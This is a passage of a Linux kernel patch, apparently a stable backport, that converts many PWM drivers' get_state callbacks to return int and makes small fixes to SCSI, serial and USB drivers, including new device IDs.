++++ b/drivers/pwm/pwm-lpss.c
+@@ -205,8 +205,8 @@ static int pwm_lpss_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	return ret;
+ }
+ 
+-static void pwm_lpss_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+-			       struct pwm_state *state)
++static int pwm_lpss_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
++			      struct pwm_state *state)
+ {
+ 	struct pwm_lpss_chip *lpwm = to_lpwm(chip);
+ 	unsigned long base_unit_range;
+@@ -236,6 +236,8 @@ static void pwm_lpss_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	state->enabled = !!(ctrl & PWM_ENABLE);
+ 
+ 	pm_runtime_put(chip->dev);
++
++	return 0;
+ }
+ 
+ static const struct pwm_ops pwm_lpss_ops = {
+diff --git a/drivers/pwm/pwm-meson.c b/drivers/pwm/pwm-meson.c
+index 57112f438c6dd..5cd7b90872c62 100644
+--- a/drivers/pwm/pwm-meson.c
++++ b/drivers/pwm/pwm-meson.c
+@@ -162,6 +162,12 @@ static int meson_pwm_calc(struct meson_pwm *meson, struct pwm_device *pwm,
+ 	duty = state->duty_cycle;
+ 	period = state->period;
+ 
++	/*
++	 * Note this is wrong. The result is an output wave that isn't really
++	 * inverted and so is wrongly identified by .get_state as normal.
++	 * Fixing this needs some care however as some machines might rely on
++	 * this.
++	 */
+ 	if (state->polarity == PWM_POLARITY_INVERSED)
+ 		duty = period - duty;
+ 
+@@ -318,8 +324,8 @@ static unsigned int meson_pwm_cnt_to_ns(struct pwm_chip *chip,
+ 	return cnt * fin_ns * (channel->pre_div + 1);
+ }
+ 
+-static void meson_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+-				struct pwm_state *state)
++static int meson_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
++			       struct pwm_state *state)
+ {
+ 	struct meson_pwm *meson = to_meson_pwm(chip);
+ 	struct meson_pwm_channel_data *channel_data;
+@@ -327,7 +333,7 @@ static void meson_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	u32 value, tmp;
+ 
+ 	if (!state)
+-		return;
++		return 0;
+ 
+ 	channel = &meson->channels[pwm->hwpwm];
+ 	channel_data = &meson_pwm_per_channel_data[pwm->hwpwm];
+@@ -357,6 +363,10 @@ static void meson_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 		state->period = 0;
+ 		state->duty_cycle = 0;
+ 	}
++
++	state->polarity = PWM_POLARITY_NORMAL;
++
++	return 0;
+ }
+ 
+ static const struct pwm_ops meson_pwm_ops = {
+diff --git a/drivers/pwm/pwm-mtk-disp.c b/drivers/pwm/pwm-mtk-disp.c
+index 3fbb4bae93a4e..ccf0ccdef29df 100644
+--- a/drivers/pwm/pwm-mtk-disp.c
++++ b/drivers/pwm/pwm-mtk-disp.c
+@@ -172,9 +172,9 @@ static int mtk_disp_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	return 0;
+ }
+ 
+-static void mtk_disp_pwm_get_state(struct pwm_chip *chip,
+-				   struct pwm_device *pwm,
+-				   struct pwm_state *state)
++static int mtk_disp_pwm_get_state(struct pwm_chip *chip,
++				  struct pwm_device *pwm,
++				  struct pwm_state *state)
+ {
+ 	struct mtk_disp_pwm *mdp = to_mtk_disp_pwm(chip);
+ 	u64 rate, period, high_width;
+@@ -184,14 +184,14 @@ static void mtk_disp_pwm_get_state(struct pwm_chip *chip,
+ 	err = clk_prepare_enable(mdp->clk_main);
+ 	if (err < 0) {
+ 		dev_err(chip->dev, "Can't enable mdp->clk_main: %pe\n", ERR_PTR(err));
+-		return;
++		return 0;
+ 	}
+ 
+ 	err = clk_prepare_enable(mdp->clk_mm);
+ 	if (err < 0) {
+ 		dev_err(chip->dev, "Can't enable mdp->clk_mm: %pe\n", ERR_PTR(err));
+ 		clk_disable_unprepare(mdp->clk_main);
+-		return;
++		return 0;
+ 	}
+ 
+ 	rate = clk_get_rate(mdp->clk_main);
+@@ -212,6 +212,8 @@ static void mtk_disp_pwm_get_state(struct pwm_chip *chip,
+ 	state->polarity = PWM_POLARITY_NORMAL;
+ 	clk_disable_unprepare(mdp->clk_mm);
+ 	clk_disable_unprepare(mdp->clk_main);
++
++	return 0;
+ }
+ 
+ static const struct pwm_ops mtk_disp_pwm_ops = {
+diff --git a/drivers/pwm/pwm-pca9685.c b/drivers/pwm/pwm-pca9685.c
+index f230c10d28bb2..41be244e7dd3d 100644
+--- a/drivers/pwm/pwm-pca9685.c
++++ b/drivers/pwm/pwm-pca9685.c
+@@ -431,8 +431,8 @@ static int pca9685_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	return ret;
+ }
+ 
+-static void pca9685_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+-				  struct pwm_state *state)
++static int pca9685_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
++				 struct pwm_state *state)
+ {
+ 	struct pca9685 *pca = to_pca(chip);
+ 	unsigned long long duty;
+@@ -458,12 +458,14 @@ static void pca9685_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 		 */
+ 		state->duty_cycle = 0;
+ 		state->enabled = false;
+-		return;
++		return 0;
+ 	}
+ 
+ 	state->enabled = true;
+ 	duty = pca9685_pwm_get_duty(pca, pwm->hwpwm);
+ 	state->duty_cycle = DIV_ROUND_DOWN_ULL(duty * state->period, PCA9685_COUNTER_RANGE);
++
++	return 0;
+ }
+ 
+ static int pca9685_pwm_request(struct pwm_chip *chip, struct pwm_device *pwm)
+diff --git a/drivers/pwm/pwm-raspberrypi-poe.c b/drivers/pwm/pwm-raspberrypi-poe.c
+index 6ff73029f367f..2939b71a7ba7b 100644
+--- a/drivers/pwm/pwm-raspberrypi-poe.c
++++ b/drivers/pwm/pwm-raspberrypi-poe.c
+@@ -82,9 +82,9 @@ static int raspberrypi_pwm_get_property(struct rpi_firmware *firmware,
+ 	return 0;
+ }
+ 
+-static void raspberrypi_pwm_get_state(struct pwm_chip *chip,
+-				      struct pwm_device *pwm,
+-				      struct pwm_state *state)
++static int raspberrypi_pwm_get_state(struct pwm_chip *chip,
++				     struct pwm_device *pwm,
++				     struct pwm_state *state)
+ {
+ 	struct raspberrypi_pwm *rpipwm = raspberrypi_pwm_from_chip(chip);
+ 
+@@ -93,6 +93,8 @@ static void raspberrypi_pwm_get_state(struct pwm_chip *chip,
+ 					 RPI_PWM_MAX_DUTY);
+ 	state->enabled = !!(rpipwm->duty_cycle);
+ 	state->polarity = PWM_POLARITY_NORMAL;
++
++	return 0;
+ }
+ 
+ static int raspberrypi_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+diff --git a/drivers/pwm/pwm-rockchip.c b/drivers/pwm/pwm-rockchip.c
+index a5af859217c19..3ec7d17569034 100644
+--- a/drivers/pwm/pwm-rockchip.c
++++ b/drivers/pwm/pwm-rockchip.c
+@@ -57,9 +57,9 @@ static inline struct rockchip_pwm_chip *to_rockchip_pwm_chip(struct pwm_chip *c)
+ 	return container_of(c, struct rockchip_pwm_chip, chip);
+ }
+ 
+-static void rockchip_pwm_get_state(struct pwm_chip *chip,
+-				   struct pwm_device *pwm,
+-				   struct pwm_state *state)
++static int rockchip_pwm_get_state(struct pwm_chip *chip,
++				  struct pwm_device *pwm,
++				  struct pwm_state *state)
+ {
+ 	struct rockchip_pwm_chip *pc = to_rockchip_pwm_chip(chip);
+ 	u32 enable_conf = pc->data->enable_conf;
+@@ -70,11 +70,11 @@ static void rockchip_pwm_get_state(struct pwm_chip *chip,
+ 
+ 	ret = clk_enable(pc->pclk);
+ 	if (ret)
+-		return;
++		return 0;
+ 
+ 	ret = clk_enable(pc->clk);
+ 	if (ret)
+-		return;
++		return 0;
+ 
+ 	clk_rate = clk_get_rate(pc->clk);
+ 
+@@ -96,6 +96,8 @@ static void rockchip_pwm_get_state(struct pwm_chip *chip,
+ 
+ 	clk_disable(pc->clk);
+ 	clk_disable(pc->pclk);
++
++	return 0;
+ }
+ 
+ static void rockchip_pwm_config(struct pwm_chip *chip, struct pwm_device *pwm,
+diff --git a/drivers/pwm/pwm-sifive.c b/drivers/pwm/pwm-sifive.c
+index 89d53a0f91e65..393a4b97fc19e 100644
+--- a/drivers/pwm/pwm-sifive.c
++++ b/drivers/pwm/pwm-sifive.c
+@@ -105,8 +105,8 @@ static void pwm_sifive_update_clock(struct pwm_sifive_ddata *ddata,
+ 		"New real_period = %u ns\n", ddata->real_period);
+ }
+ 
+-static void pwm_sifive_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+-				 struct pwm_state *state)
++static int pwm_sifive_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
++				struct pwm_state *state)
+ {
+ 	struct pwm_sifive_ddata *ddata = pwm_sifive_chip_to_ddata(chip);
+ 	u32 duty, val;
+@@ -123,6 +123,8 @@ static void pwm_sifive_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	state->duty_cycle =
+ 		(u64)duty * ddata->real_period >> PWM_SIFIVE_CMPWIDTH;
+ 	state->polarity = PWM_POLARITY_INVERSED;
++
++	return 0;
+ }
+ 
+ static int pwm_sifive_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+diff --git a/drivers/pwm/pwm-sl28cpld.c b/drivers/pwm/pwm-sl28cpld.c
+index 589aeaaa6ac86..e64900ad4ba1e 100644
+--- a/drivers/pwm/pwm-sl28cpld.c
++++ b/drivers/pwm/pwm-sl28cpld.c
+@@ -87,9 +87,9 @@ struct sl28cpld_pwm {
+ #define sl28cpld_pwm_from_chip(_chip) \
+ 	container_of(_chip, struct sl28cpld_pwm, pwm_chip)
+ 
+-static void sl28cpld_pwm_get_state(struct pwm_chip *chip,
+-				   struct pwm_device *pwm,
+-				   struct pwm_state *state)
++static int sl28cpld_pwm_get_state(struct pwm_chip *chip,
++				  struct pwm_device *pwm,
++				  struct pwm_state *state)
+ {
+ 	struct sl28cpld_pwm *priv = sl28cpld_pwm_from_chip(chip);
+ 	unsigned int reg;
+@@ -115,6 +115,8 @@ static void sl28cpld_pwm_get_state(struct pwm_chip *chip,
+ 	 * the PWM core.
+ 	 */
+ 	state->duty_cycle = min(state->duty_cycle, state->period);
++
++	return 0;
+ }
+ 
+ static int sl28cpld_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+diff --git a/drivers/pwm/pwm-sprd.c b/drivers/pwm/pwm-sprd.c
+index 7004f55bbf115..87d5cb7f67d67 100644
+--- a/drivers/pwm/pwm-sprd.c
++++ b/drivers/pwm/pwm-sprd.c
+@@ -65,8 +65,8 @@ static void sprd_pwm_write(struct sprd_pwm_chip *spc, u32 hwid,
+ 	writel_relaxed(val, spc->base + offset);
+ }
+ 
+-static void sprd_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+-			       struct pwm_state *state)
++static int sprd_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
++			      struct pwm_state *state)
+ {
+ 	struct sprd_pwm_chip *spc =
+ 		container_of(chip, struct sprd_pwm_chip, chip);
+@@ -83,7 +83,7 @@ static void sprd_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	if (ret) {
+ 		dev_err(spc->dev, "failed to enable pwm%u clocks\n",
+ 			pwm->hwpwm);
+-		return;
++		return 0;
+ 	}
+ 
+ 	val = sprd_pwm_read(spc, pwm->hwpwm, SPRD_PWM_ENABLE);
+@@ -109,10 +109,13 @@ static void sprd_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	duty = val & SPRD_PWM_DUTY_MSK;
+ 	tmp = (prescale + 1) * NSEC_PER_SEC * duty;
+ 	state->duty_cycle = DIV_ROUND_CLOSEST_ULL(tmp, chn->clk_rate);
++	state->polarity = PWM_POLARITY_NORMAL;
+ 
+ 	/* Disable PWM clocks if the PWM channel is not in enable state. */
+ 	if (!state->enabled)
+ 		clk_bulk_disable_unprepare(SPRD_PWM_CHN_CLKS_NUM, chn->clks);
++
++	return 0;
+ }
+ 
+ static int sprd_pwm_config(struct sprd_pwm_chip *spc, struct pwm_device *pwm,
+diff --git a/drivers/pwm/pwm-stm32-lp.c b/drivers/pwm/pwm-stm32-lp.c
+index 61a1c87cd5016..31a185c6b8da4 100644
+--- a/drivers/pwm/pwm-stm32-lp.c
++++ b/drivers/pwm/pwm-stm32-lp.c
+@@ -157,9 +157,9 @@ err:
+ 	return ret;
+ }
+ 
+-static void stm32_pwm_lp_get_state(struct pwm_chip *chip,
+-				   struct pwm_device *pwm,
+-				   struct pwm_state *state)
++static int stm32_pwm_lp_get_state(struct pwm_chip *chip,
++				  struct pwm_device *pwm,
++				  struct pwm_state *state)
+ {
+ 	struct stm32_pwm_lp *priv = to_stm32_pwm_lp(chip);
+ 	unsigned long rate = clk_get_rate(priv->clk);
+@@ -185,6 +185,8 @@ static void stm32_pwm_lp_get_state(struct pwm_chip *chip,
+ 	tmp = prd - val;
+ 	tmp = (tmp << presc) * NSEC_PER_SEC;
+ 	state->duty_cycle = DIV_ROUND_CLOSEST_ULL(tmp, rate);
++
++	return 0;
+ }
+ 
+ static const struct pwm_ops stm32_pwm_lp_ops = {
+diff --git a/drivers/pwm/pwm-sun4i.c b/drivers/pwm/pwm-sun4i.c
+index c8445b0a33392..37d75e252d4e7 100644
+--- a/drivers/pwm/pwm-sun4i.c
++++ b/drivers/pwm/pwm-sun4i.c
+@@ -108,9 +108,9 @@ static inline void sun4i_pwm_writel(struct sun4i_pwm_chip *chip,
+ 	writel(val, chip->base + offset);
+ }
+ 
+-static void sun4i_pwm_get_state(struct pwm_chip *chip,
+-				struct pwm_device *pwm,
+-				struct pwm_state *state)
++static int sun4i_pwm_get_state(struct pwm_chip *chip,
++			       struct pwm_device *pwm,
++			       struct pwm_state *state)
+ {
+ 	struct sun4i_pwm_chip *sun4i_pwm = to_sun4i_pwm_chip(chip);
+ 	u64 clk_rate, tmp;
+@@ -132,7 +132,7 @@ static void sun4i_pwm_get_state(struct pwm_chip *chip,
+ 		state->duty_cycle = DIV_ROUND_UP_ULL(state->period, 2);
+ 		state->polarity = PWM_POLARITY_NORMAL;
+ 		state->enabled = true;
+-		return;
++		return 0;
+ 	}
+ 
+ 	if ((PWM_REG_PRESCAL(val, pwm->hwpwm) == PWM_PRESCAL_MASK) &&
+@@ -142,7 +142,7 @@ static void sun4i_pwm_get_state(struct pwm_chip *chip,
+ 		prescaler = prescaler_table[PWM_REG_PRESCAL(val, pwm->hwpwm)];
+ 
+ 	if (prescaler == 0)
+-		return;
++		return 0;
+ 
+ 	if (val & BIT_CH(PWM_ACT_STATE, pwm->hwpwm))
+ 		state->polarity = PWM_POLARITY_NORMAL;
+@@ -162,6 +162,8 @@ static void sun4i_pwm_get_state(struct pwm_chip *chip,
+ 
+ 	tmp = (u64)prescaler * NSEC_PER_SEC * PWM_REG_PRD(val);
+ 	state->period = DIV_ROUND_CLOSEST_ULL(tmp, clk_rate);
++
++	return 0;
+ }
+ 
+ static int sun4i_pwm_calculate(struct sun4i_pwm_chip *sun4i_pwm,
+diff --git a/drivers/pwm/pwm-sunplus.c b/drivers/pwm/pwm-sunplus.c
+index e776fd16512de..d6ebe9f03b354 100644
+--- a/drivers/pwm/pwm-sunplus.c
++++ b/drivers/pwm/pwm-sunplus.c
+@@ -124,8 +124,8 @@ static int sunplus_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	return 0;
+ }
+ 
+-static void sunplus_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+-				  struct pwm_state *state)
++static int sunplus_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
++				 struct pwm_state *state)
+ {
+ 	struct sunplus_pwm *priv = to_sunplus_pwm(chip);
+ 	u32 mode0, dd_freq, duty;
+@@ -155,6 +155,8 @@ static void sunplus_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	}
+ 
+ 	state->polarity = PWM_POLARITY_NORMAL;
++
++	return 0;
+ }
+ 
+ static const struct pwm_ops sunplus_pwm_ops = {
+diff --git a/drivers/pwm/pwm-visconti.c b/drivers/pwm/pwm-visconti.c
+index 927c4cbb1daf0..e3fb79b3e2a7a 100644
+--- a/drivers/pwm/pwm-visconti.c
++++ b/drivers/pwm/pwm-visconti.c
+@@ -103,8 +103,8 @@ static int visconti_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	return 0;
+ }
+ 
+-static void visconti_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+-				   struct pwm_state *state)
++static int visconti_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
++				  struct pwm_state *state)
+ {
+ 	struct visconti_pwm_chip *priv = visconti_pwm_from_chip(chip);
+ 	u32 period, duty, pwmc0, pwmc0_clk;
+@@ -122,6 +122,8 @@ static void visconti_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm
+ 		state->polarity = PWM_POLARITY_NORMAL;
+ 
+ 	state->enabled = true;
++
++	return 0;
+ }
+ 
+ static const struct pwm_ops visconti_pwm_ops = {
+diff --git a/drivers/pwm/pwm-xilinx.c b/drivers/pwm/pwm-xilinx.c
+index 4dab2b86c4276..f7a50fdcd9a52 100644
+--- a/drivers/pwm/pwm-xilinx.c
++++ b/drivers/pwm/pwm-xilinx.c
+@@ -169,9 +169,9 @@ static int xilinx_pwm_apply(struct pwm_chip *chip, struct pwm_device *unused,
+ 	return 0;
+ }
+ 
+-static void xilinx_pwm_get_state(struct pwm_chip *chip,
+-				 struct pwm_device *unused,
+-				 struct pwm_state *state)
++static int xilinx_pwm_get_state(struct pwm_chip *chip,
++				struct pwm_device *unused,
++				struct pwm_state *state)
+ {
+ 	struct xilinx_timer_priv *priv = xilinx_pwm_chip_to_priv(chip);
+ 	u32 tlr0, tlr1, tcsr0, tcsr1;
+@@ -191,6 +191,8 @@ static void xilinx_pwm_get_state(struct pwm_chip *chip,
+ 	 */
+ 	if (state->period == state->duty_cycle)
+ 		state->duty_cycle = 0;
++
++	return 0;
+ }
+ 
+ static const struct pwm_ops xilinx_pwm_ops = {
+diff --git a/drivers/scsi/iscsi_tcp.c b/drivers/scsi/iscsi_tcp.c
+index c3ad04ad66e0a..8009eab3b7bee 100644
+--- a/drivers/scsi/iscsi_tcp.c
++++ b/drivers/scsi/iscsi_tcp.c
+@@ -767,13 +767,12 @@ static int iscsi_sw_tcp_conn_set_param(struct iscsi_cls_conn *cls_conn,
+ 		iscsi_set_param(cls_conn, param, buf, buflen);
+ 		break;
+ 	case ISCSI_PARAM_DATADGST_EN:
+-		iscsi_set_param(cls_conn, param, buf, buflen);
+-
+ 		mutex_lock(&tcp_sw_conn->sock_lock);
+ 		if (!tcp_sw_conn->sock) {
+ 			mutex_unlock(&tcp_sw_conn->sock_lock);
+ 			return -ENOTCONN;
+ 		}
++		iscsi_set_param(cls_conn, param, buf, buflen);
+ 		tcp_sw_conn->sendpage = conn->datadgst_en ?
+ 			sock_no_sendpage : tcp_sw_conn->sock->ops->sendpage;
+ 		mutex_unlock(&tcp_sw_conn->sock_lock);
+diff --git a/drivers/scsi/qla2xxx/qla_os.c b/drivers/scsi/qla2xxx/qla_os.c
+index 7d2d872bae3c5..08dc825fbf4f6 100644
+--- a/drivers/scsi/qla2xxx/qla_os.c
++++ b/drivers/scsi/qla2xxx/qla_os.c
+@@ -3608,6 +3608,7 @@ skip_dpc:
+ probe_failed:
+ 	qla_enode_stop(base_vha);
+ 	qla_edb_stop(base_vha);
++	vfree(base_vha->scan.l);
+ 	if (base_vha->gnl.l) {
+ 		dma_free_coherent(&ha->pdev->dev, base_vha->gnl.size,
+ 				base_vha->gnl.l, base_vha->gnl.ldma);
+diff --git a/drivers/tty/serial/8250/8250_port.c b/drivers/tty/serial/8250/8250_port.c
+index 388172289627a..2a3bd6918c77e 100644
+--- a/drivers/tty/serial/8250/8250_port.c
++++ b/drivers/tty/serial/8250/8250_port.c
+@@ -1897,6 +1897,17 @@ EXPORT_SYMBOL_GPL(serial8250_modem_status);
+ static bool handle_rx_dma(struct uart_8250_port *up, unsigned int iir)
+ {
+ 	switch (iir & 0x3f) {
++	case UART_IIR_THRI:
++		/*
++		 * Postpone DMA or not decision to IIR_RDI or IIR_RX_TIMEOUT
++		 * because it's impossible to do an informed decision about
++		 * that with IIR_THRI.
++		 *
++		 * This also fixes one known DMA Rx corruption issue where
++		 * DR is asserted but DMA Rx only gets a corrupted zero byte
++		 * (too early DR?).
++		 */
++		return false;
+ 	case UART_IIR_RDI:
+ 		if (!up->dma->rx_running)
+ 			break;
+diff --git a/drivers/tty/serial/fsl_lpuart.c b/drivers/tty/serial/fsl_lpuart.c
+index cd98c04de0330..48eb5fea62fd0 100644
+--- a/drivers/tty/serial/fsl_lpuart.c
++++ b/drivers/tty/serial/fsl_lpuart.c
+@@ -838,11 +838,17 @@ static unsigned int lpuart32_tx_empty(struct uart_port *port)
+ 			struct lpuart_port, port);
+ 	unsigned long stat = lpuart32_read(port, UARTSTAT);
+ 	unsigned long sfifo = lpuart32_read(port, UARTFIFO);
++	unsigned long ctrl = lpuart32_read(port, UARTCTRL);
+ 
+ 	if (sport->dma_tx_in_progress)
+ 		return 0;
+ 
+-	if (stat & UARTSTAT_TC && sfifo & UARTFIFO_TXEMPT)
++	/*
++	 * LPUART Transmission Complete Flag may never be set while queuing a break
++	 * character, so avoid checking for transmission complete when UARTCTRL_SBK
++	 * is asserted.
++	 */
++	if ((stat & UARTSTAT_TC && sfifo & UARTFIFO_TXEMPT) || ctrl & UARTCTRL_SBK)
+ 		return TIOCSER_TEMT;
+ 
+ 	return 0;
+diff --git a/drivers/tty/serial/sh-sci.c b/drivers/tty/serial/sh-sci.c
+index 62f773286d44b..e67d3a886bf4f 100644
+--- a/drivers/tty/serial/sh-sci.c
++++ b/drivers/tty/serial/sh-sci.c
+@@ -31,6 +31,7 @@
+ #include <linux/ioport.h>
+ #include <linux/ktime.h>
+ #include <linux/major.h>
++#include <linux/minmax.h>
+ #include <linux/module.h>
+ #include <linux/mm.h>
+ #include <linux/of.h>
+@@ -2867,6 +2868,13 @@ static int sci_init_single(struct platform_device *dev,
+ 			sci_port->irqs[i] = platform_get_irq(dev, i);
+ 	}
+ 
++	/*
++	 * The fourth interrupt on SCI port is transmit end interrupt, so
++	 * shuffle the interrupts.
++	 */
++	if (p->type == PORT_SCI)
++		swap(sci_port->irqs[SCIx_BRI_IRQ], sci_port->irqs[SCIx_TEI_IRQ]);
++
+ 	/* The SCI generates several interrupts. They can be muxed together or
+ 	 * connected to different interrupt lines. In the muxed case only one
+ 	 * interrupt resource is specified as there is only one interrupt ID.
+@@ -2932,7 +2940,7 @@ static int sci_init_single(struct platform_device *dev,
+ 	port->flags		= UPF_FIXED_PORT | UPF_BOOT_AUTOCONF | p->flags;
+ 	port->fifosize		= sci_port->params->fifosize;
+ 
+-	if (port->type == PORT_SCI) {
++	if (port->type == PORT_SCI && !dev->dev.of_node) {
+ 		if (sci_port->reg_size >= 0x20)
+ 			port->regshift = 2;
+ 		else
+diff --git a/drivers/usb/cdns3/cdnsp-ep0.c b/drivers/usb/cdns3/cdnsp-ep0.c
+index d63d5d92f2554..f317d3c847810 100644
+--- a/drivers/usb/cdns3/cdnsp-ep0.c
++++ b/drivers/usb/cdns3/cdnsp-ep0.c
+@@ -414,7 +414,7 @@ static int cdnsp_ep0_std_request(struct cdnsp_device *pdev,
+ void cdnsp_setup_analyze(struct cdnsp_device *pdev)
+ {
+ 	struct usb_ctrlrequest *ctrl = &pdev->setup;
+-	int ret = 0;
++	int ret = -EINVAL;
+ 	u16 len;
+ 
+ 	trace_cdnsp_ctrl_req(ctrl);
+@@ -424,7 +424,6 @@ void cdnsp_setup_analyze(struct cdnsp_device *pdev)
+ 
+ 	if (pdev->gadget.state == USB_STATE_NOTATTACHED) {
+ 		dev_err(pdev->dev, "ERR: Setup detected in unattached state\n");
+-		ret = -EINVAL;
+ 		goto out;
+ 	}
+ 
+diff --git a/drivers/usb/dwc3/dwc3-pci.c b/drivers/usb/dwc3/dwc3-pci.c
+index a23ddbb819795..560793545362a 100644
+--- a/drivers/usb/dwc3/dwc3-pci.c
++++ b/drivers/usb/dwc3/dwc3-pci.c
+@@ -49,6 +49,7 @@
+ #define PCI_DEVICE_ID_INTEL_RPLS		0x7a61
+ #define PCI_DEVICE_ID_INTEL_MTLM		0x7eb1
+ #define PCI_DEVICE_ID_INTEL_MTLP		0x7ec1
++#define PCI_DEVICE_ID_INTEL_MTLS		0x7f6f
+ #define PCI_DEVICE_ID_INTEL_MTL			0x7e7e
+ #define PCI_DEVICE_ID_INTEL_TGL			0x9a15
+ #define PCI_DEVICE_ID_AMD_MR			0x163a
+@@ -474,6 +475,9 @@ static const struct pci_device_id dwc3_pci_id_table[] = {
+ 	{ PCI_VDEVICE(INTEL, PCI_DEVICE_ID_INTEL_MTLP),
+ 	  (kernel_ulong_t) &dwc3_pci_intel_swnode, },
+ 
++	{ PCI_VDEVICE(INTEL, PCI_DEVICE_ID_INTEL_MTLS),
++	  (kernel_ulong_t) &dwc3_pci_intel_swnode, },
++
+ 	{ PCI_VDEVICE(INTEL, PCI_DEVICE_ID_INTEL_MTL),
+ 	  (kernel_ulong_t) &dwc3_pci_intel_swnode, },
+ 
+diff --git a/drivers/usb/host/xhci-tegra.c b/drivers/usb/host/xhci-tegra.c
+index bdb776553826b..32df571bb2339 100644
+--- a/drivers/usb/host/xhci-tegra.c
++++ b/drivers/usb/host/xhci-tegra.c
+@@ -1225,6 +1225,9 @@ static void tegra_xhci_id_work(struct work_struct *work)
+ 
+ 	mutex_unlock(&tegra->lock);
+ 
++	tegra->otg_usb3_port = tegra_xusb_padctl_get_usb3_companion(tegra->padctl,
++								    tegra->otg_usb2_port);
++
+ 	if (tegra->host_mode) {
+ 		/* switch to host mode */
+ 		if (tegra->otg_usb3_port >= 0) {
+@@ -1339,9 +1342,6 @@ static int tegra_xhci_id_notify(struct notifier_block *nb,
+ 	}
+ 
+ 	tegra->otg_usb2_port = tegra_xusb_get_usb2_port(tegra, usbphy);
+-	tegra->otg_usb3_port = tegra_xusb_padctl_get_usb3_companion(
+-							tegra->padctl,
+-							tegra->otg_usb2_port);
+ 
+ 	tegra->host_mode = (usbphy->last_event == USB_EVENT_ID) ? true : false;
+ 
+diff --git a/drivers/usb/host/xhci.c b/drivers/usb/host/xhci.c
+index 2b280beb00115..c02ad4f76bb3c 100644
+--- a/drivers/usb/host/xhci.c
++++ b/drivers/usb/host/xhci.c
+@@ -9,6 +9,7 @@
+  */
+ 
+ #include <linux/pci.h>
++#include <linux/iommu.h>
+ #include <linux/iopoll.h>
+ #include <linux/irq.h>
+ #include <linux/log2.h>
+@@ -228,6 +229,7 @@ int xhci_reset(struct xhci_hcd *xhci, u64 timeout_us)
+ static void xhci_zero_64b_regs(struct xhci_hcd *xhci)
+ {
+ 	struct device *dev = xhci_to_hcd(xhci)->self.sysdev;
++	struct iommu_domain *domain;
+ 	int err, i;
+ 	u64 val;
+ 	u32 intrs;
+@@ -246,7 +248,9 @@ static void xhci_zero_64b_regs(struct xhci_hcd *xhci)
+ 	 * an iommu. Doing anything when there is no iommu is definitely
+ 	 * unsafe...
+ 	 */
+-	if (!(xhci->quirks & XHCI_ZERO_64B_REGS) || !device_iommu_mapped(dev))
++	domain = iommu_get_domain_for_dev(dev);
++	if (!(xhci->quirks & XHCI_ZERO_64B_REGS) || !domain ||
++	    domain->type == IOMMU_DOMAIN_IDENTITY)
+ 		return;
+ 
+ 	xhci_info(xhci, "Zeroing 64bit base registers, expecting fault\n");
+@@ -4406,6 +4410,7 @@ static int __maybe_unused xhci_change_max_exit_latency(struct xhci_hcd *xhci,
+ 
+ 	if (!virt_dev || max_exit_latency == virt_dev->current_mel) {
+ 		spin_unlock_irqrestore(&xhci->lock, flags);
++		xhci_free_command(xhci, command);
+ 		return 0;
+ 	}
+ 
+diff --git a/drivers/usb/serial/cp210x.c b/drivers/usb/serial/cp210x.c
+index ba5638471de49..f1d7a5a863aa4 100644
+--- a/drivers/usb/serial/cp210x.c
++++ b/drivers/usb/serial/cp210x.c
+@@ -120,6 +120,7 @@ static const struct usb_device_id id_table[] = {
+ 	{ USB_DEVICE(0x10C4, 0x826B) }, /* Cygnal Integrated Products, Inc., Fasttrax GPS demonstration module */
+ 	{ USB_DEVICE(0x10C4, 0x8281) }, /* Nanotec Plug & Drive */
+ 	{ USB_DEVICE(0x10C4, 0x8293) }, /* Telegesis ETRX2USB */
++	{ USB_DEVICE(0x10C4, 0x82AA) }, /* Silicon Labs IFS-USB-DATACABLE used with Quint UPS */
+ 	{ USB_DEVICE(0x10C4, 0x82EF) }, /* CESINEL FALCO 6105 AC Power Supply */
+ 	{ USB_DEVICE(0x10C4, 0x82F1) }, /* CESINEL MEDCAL EFD Earth Fault Detector */
+ 	{ USB_DEVICE(0x10C4, 0x82F2) }, /* CESINEL MEDCAL ST Network Analyzer */
+diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
+index a8534065e0d6d..fc12fee66141f 100644
+--- a/drivers/usb/serial/option.c
++++ b/drivers/usb/serial/option.c
+@@ -1198,6 +1198,8 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_RM520N, 0xff, 0xff, 0x30) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_RM520N, 0xff, 0, 0x40) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_RM520N, 0xff, 0, 0) },
